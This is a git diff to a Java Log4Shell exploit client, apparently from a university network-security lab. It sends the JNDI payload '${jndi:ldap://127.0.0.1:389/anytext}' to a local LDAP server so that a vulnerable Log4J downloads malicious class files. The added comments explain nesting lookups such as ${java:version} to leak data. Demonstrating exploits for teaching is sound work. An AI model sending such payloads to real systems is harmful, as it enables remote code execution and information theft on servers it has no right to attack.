diff --git a/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java b/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java
index b4321133180273ca4b2a12940e9c8fc0e4e0f700..4cbf8b6519c0cb383b911072201dbf11361725fd 100644
--- a/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java
+++ b/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java
@@ -23,8 +23,15 @@ public class Log4ShellClient {
 
             // Sends the malicious message to trigger the remote code execution.
             // The message references to the LDAP server simultaneously running on port 389.
-            // Vulnerable Log4J version will contact it and download malicious class files.
+            // A vulnerable Log4J version will contact it and download malicious class files.
             // It is important to put any string after the last slash, otherwise the attack won't work.
+
+            // Furthermore, it is also possible to replace 'anytext' with even more lookups.
+            // They will be evaluated before the request is sent to the LDAP server.
+            // Henceforth, one can send the string '${jndi:ldap://127.0.0.1:389/${java:version}}' which first
+            // evaluates the Java version and then sends the LDAP request.
+            // See: https://logging.apache.org/log4j/2.x/manual/lookups.html
+
             writer.println("${jndi:ldap://127.0.0.1:389/anytext}");
 
             writer.close();